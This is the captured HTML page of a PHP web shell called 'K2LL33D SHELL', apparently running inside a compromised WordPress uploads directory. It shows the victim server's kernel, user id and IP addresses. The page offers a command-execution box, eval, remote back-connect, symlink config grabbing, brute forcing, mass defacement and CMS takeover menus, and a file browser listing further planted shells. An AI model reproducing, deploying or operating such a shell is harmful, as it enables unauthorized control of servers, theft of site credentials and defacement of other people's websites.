45,0.3);font-family:orbitron;border-bottom:0px;}div#menu ul ul {position:absolute;top:18px;left:-990em;width:130px;padding:5px 0 5px 0;background:black;margin-top:2px;}div#menu ul ul a {padding:2px 2px 2px 10px;height:20px;float:none;display:block;color:white;}.k2ll33d2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00ff00;font-size:25px;text-shadow: 5px 5px 5px black;} .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #EC4D00; padding:4px 2px;width:70%;line-height:24px;background:#111111;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ffffff;-moz-box-shadow: 0px 4px 2px #ffffff;}.myboxtbl{ width:50%; }body{background:#010101;} a {text-decoration:none;} hr, a:hover{border-bottom:1px solid #4C83AF;} *{text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF;} .tabnet{margin:15px auto 0 auto;border: 1px solid #333333;} .main {width:100%;} .gaya {color: #888888;} .top{border-left:1px solid #4C83AF;border-RIGHT:1px solid #4C83AF;font-family:verdana;} .inputz, option{outline:none;transition: all 0.20s ease-in-out;-webkit-transition: all 0.20s ease-in-out;-moz-transition: all 0.20s ease-in-out;border:1px solid rgba(0,0,0, 0.2);background:#111111; border:0; padding:2px; border-bottom:1px solid #393939; font-size:11px; color:#ffffff; -moz-border-radius: 6px; border-radius: 12px; border:1px solid #4C83AF;margin:4px 0 8px 0;} .inputzbut{background:#111111;color:#8f8f8f;margin:0 4px;border:1px solid #555555;}  .inputzbut:hover{background:#222222;border-left:1px solid #4C83AF;border-right:1px solid #4C83AF;border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}.inputz:hover{ -moz-border-radius: 6px; border-radius: 10px; border:1px solid #4C83AF;margin:4px 0 8px 0;border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}.output2 {margin:auto;border:1px solid #888888;background:#000000;padding:0 2px;} textarea{margin:auto;border:2px solid #555555;background:#000000;padding:0 2px;} .output {margin:auto;border:1px solid #303030;width:100%;height:400px;background:#000000;padding:0 2px;} .cmdbox{width:100%;}.head_info{padding: 0 4px;} .b1{font-size:30px;padding:0;color:#555555;} .b2{font-size:30px;padding:0;color:#800000;} .b_tbl{text-align:center;margin:0 4px 0 0;padding:0 4px 0 0;border-right:1px solid #333333;} .phpinfo table{width:100%;padding:0 0 0 0;} .phpinfo td{background:#111111;color:#cccccc;padding:6px 8px;;} .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;} .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;} .explore{width:100%;} .explore a {text-decoration:none;} .explore td{border-bottom:1px solid #454545;padding:0 8px;line-height:24px;} .explore th{padding:3px 8px;font-weight:normal;color:#999999;} .explore th:hover , .phpinfo th:hover, th:hover{color:black;background:#00ff00;} .explore tr:hover{background:rgba(35,96,156,0.2);} .viewfile{background:#EDECEB;color:#000000;margin:4px 2px;padding:8px;} .
    sembunyi{display:none;padding:0;margin:0;} k, k a, k a:hover{text-shadow: 0pt 0pt 0.3em red;font-family:orbitron;font-size:25px;color:#ffffff;}</style><body onLoad="document.getElementById('cmd').focus();"><div class="main"><div class="head_info"> <table width="100%"><tr><td width="23%"><table class="b_tbl">
    <H2 CLASS="TITLE">K2LL33D SHELL</H2>  <div id="menu"><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=about">About Me</a></div>
    </td></tr></table></td><td class="top" width='60%'>&nbsp;Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_mono/2.6.3 mod_bwlimited/1.4<br>&nbsp;Linux server.leecreative.co.uk 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64<br>&nbsp;uid=551(document) gid=551(document) groups=551(document)<br>&nbsp;safemode :&nbsp;<b><font style='color:#00FF00'>OFF</font></b><br>&nbsp;MySQL: <b><font style='color:#00FF00'>ON</font></b>&nbsp;|&nbsp;Perl: <b><font style='color:#00FF00'>ON</font></b>&nbsp;|&nbsp;cURL: <b><font style='color:#00FF00'>ON</font></b>&nbsp;|&nbsp;WGet: <b><font style='color:#00FF00'>ON</font></b><br>&nbsp;&nbsp;&gt;&nbsp;<a href='?y=/'> / </a><a href='?y=/home/'>home / </a><a href='?y=/home/document/'>document / </a><a href='?y=/home/document/public_html/'>public_html / </a><a href='?y=/home/document/public_html/wp-content/'>wp-content / </a><a href='?y=/home/document/public_html/wp-content/uploads/'>uploads / </a></td>&nbsp;&nbsp;<td style="width:20%;"><a>server ip : 144.76.81.68<br><br> your ip : 37.187.39.32<br></a><br><a href="?" style="border:1px solid #EC4D00;font:12px orbitron;width:200px;padding:0px 20px 0px 20px;">H O M E</a></td></tr></table></div>
    <div id="menu"><ul class="menu"><a href="?y=/home/document/public_html/wp-content/uploads/">Files</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=shell">Shell</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=upload">upload</a><li><a>Sym</a><ul><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=sf">Symlink File</a></li><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=sec">Symlink server</a></li><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=configs">Get configs</a></li></ul></li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=php">Eval</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=back">Remote</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=mysql">Sql</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=mass">Mass</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=brute">Brute</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=phpinfo">PHP</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=zone-h">Zone-H</a><li><a>Joomla</a><ul><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=joomla">From keyboard</a></li><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=js">From symlink</a></li></ul></li><li><a>Wordpress</a><ul><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=keyboard">From Keyboard</a></li><li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=config">From Symlink</a></li></ul></li><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=vb">Vb</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=domains">Domains</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=string">String</a><a href="?y=/home/document/public_html/wp-content/uploads/&amp;x=boom">Boom</a>&nbsp;&nbsp;</ul></div><br><br>
     <form action='?y=/home/document/public_html/wp-content/uploads/&amp;x=shell' method='post' style='margin:8px 0 0 0;'><table class='cmdbox' style='width:50%;'><tr><td>document $ </td><td><input onMouseOver='this.focus();' id='cmd' class='inputz' type='text' name='cmd' style='width:400px;' value='' /><input class='inputzbut' type='submit' value='execute !' name='submitcmd' style='width:80px;' /></td></tr></form><form action='?' method='get' style='margin:8px 0 0 0;'><input type='hidden' name='y' value='/home/document/public_html/wp-content/uploads/' /><tr><td>view file/folder</td><center><td><input onMouseOver='this.focus();' id='goto' class='inputz' type='text' name='view' style='width:400px;' value='/home/document/public_html/wp-content/uploads/' /><input class='inputzbut' type='submit' value='view !' name='submitcmd' style='width:80px;' /></td></center></tr></form></table><table class='explore'> <tr><th>name</th><th style='width:80px;'>size</th><th style='width:210px;'>owner:group</th><th style='width:80px;'>perms</th><th style='width:110px;'>modified</th><th style='width:190px;'>actions</th></tr> <tr><td><a href="?y=/home/document/public_html/wp-content/uploads/">.</a></td><td>-</td>
    <td style="text-align:center;">document<span class='gaya'> : </span>document</td>
    <td><center>rwxr-xr-x</center></td>
    <td style="text-align:center;">14-Aug-2014 16:18</td><td><span id="titik1">
    <a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/newfile.php">newfile</a> | <a href="javascript:tukar('titik1','titik1_form');">newfolder</a>
    </span><form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="y" value="/home/document/public_html/wp-content/uploads/" /> 
    <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder" /> 
    <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go" /> 
    </form></td></tr> <tr><td>
    <a href="?y=/home/document/public_html/wp-content/"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
    <td style="text-align:center;">document<span class="gaya"> : </span>document</td>
    <td><center>rwxr-xr-x</center></td> <td style="text-align:center;">12-Aug-2014 23:41</td>
    <td><span id="titik2"><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/newfile.php">newfile</a> | <a href="javascript:tukar('titik2','titik2_form');">newfolder</a></span> 
    <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="y" value="/home/document/public_html/wp-content/uploads/" /> 
    <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder" /> 
    <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go" /> 
    </form></td></tr><tr><td><a id="2013_link" href="?y=/home/document/public_html/wp-content/uploads/2013/"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />  2013</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="2013_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="2013" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newname" value="2013" /> 
    <input class="inputzbut" type="submit" name="rename" value="rename" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('2013_form','2013_link');" />
    </form> </td><td>DIR</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('2013_link','2013_form3');">rwxr-xr-x</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="2013_form3" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="2013" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0755" /> 
    <input class="inputzbut" type="submit" name="chmod_folder" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" 
    onclick="tukar('2013_link','2013_form3');" /></form></center></td><td style="text-align:center;">13-Jan-2014 13:49</td><td><a href="javascript:tukar('2013_link','2013_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;fdelete=/home/document/public_html/wp-content/uploads/2013">delete</a>
    </td>
    </tr><tr><td><a id="2014_link" href="?y=/home/document/public_html/wp-content/uploads/2014/"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />  2014</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="2014_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="2014" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newname" value="2014" /> 
    <input class="inputzbut" type="submit" name="rename" value="rename" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('2014_form','2014_link');" />
    </form> </td><td>DIR</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('2014_link','2014_form3');">rwxr-xr-x</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="2014_form3" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="2014" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0755" /> 
    <input class="inputzbut" type="submit" name="chmod_folder" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" 
    onclick="tukar('2014_link','2014_form3');" /></form></center></td><td style="text-align:center;">01-Aug-2014 02:26</td><td><a href="javascript:tukar('2014_link','2014_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;fdelete=/home/document/public_html/wp-content/uploads/2014">delete</a>
    </td>
    </tr><tr><td><a id="b0x3d_link" href="?y=/home/document/public_html/wp-content/uploads/b0x3d/"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />  b0x3d</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="b0x3d_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="b0x3d" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newname" value="b0x3d" /> 
    <input class="inputzbut" type="submit" name="rename" value="rename" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('b0x3d_form','b0x3d_link');" />
    </form> </td><td>DIR</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('b0x3d_link','b0x3d_form3');">rwxr-xr-x</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="b0x3d_form3" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="b0x3d" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0755" /> 
    <input class="inputzbut" type="submit" name="chmod_folder" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" 
    onclick="tukar('b0x3d_link','b0x3d_form3');" /></form></center></td><td style="text-align:center;">12-Aug-2014 23:58</td><td><a href="javascript:tukar('b0x3d_link','b0x3d_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;fdelete=/home/document/public_html/wp-content/uploads/b0x3d">delete</a>
    </td>
    </tr><tr><td><a id="1337.php_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/1337.php"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> 1337.php</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="1337.php_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="1337.php" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="1337.php" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('1337.php_link','1337.php_form');" />
    </form></td><td>60.3 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('1337.php_link','1337.php_form2');">rw-r--r--</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="1337.php_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="1337.php" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0644" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('1337.php_link','1337.php_form2');" /></form></center></td>
    <td style="text-align:center;">13-Aug-2014 00:41</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/1337.php">edit</a> | <a href="javascript:tukar('1337.php_link','1337.php_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/1337.php">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/1337.php">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/1337.php">gz</a>)
    </td></tr><tr><td><a id="Xcon.php_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/Xcon.php"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> Xcon.php</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="Xcon.php_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="Xcon.php" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="Xcon.php" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('Xcon.php_link','Xcon.php_form');" />
    </form></td><td>46.75 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('Xcon.php_link','Xcon.php_form2');">rw-r--r--</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="Xcon.php_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="Xcon.php" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0644" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('Xcon.php_link','Xcon.php_form2');" /></form></center></td>
    <td style="text-align:center;">12-Aug-2014 23:58</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/Xcon.php">edit</a> | <a href="javascript:tukar('Xcon.php_link','Xcon.php_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/Xcon.php">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/Xcon.php">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/Xcon.php">gz</a>)
    </td></tr><tr><td><a id="b0x_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/b0x"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> b0x</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="b0x_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="b0x" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="b0x" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('b0x_link','b0x_form');" />
    </form></td><td>13.1 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('b0x_link','b0x_form2');">rwxr-xr-x</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="b0x_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="b0x" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0755" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('b0x_link','b0x_form2');" /></form></center></td>
    <td style="text-align:center;">12-Aug-2014 23:49</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/b0x">edit</a> | <a href="javascript:tukar('b0x_link','b0x_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/b0x">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/b0x">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/b0x">gz</a>)
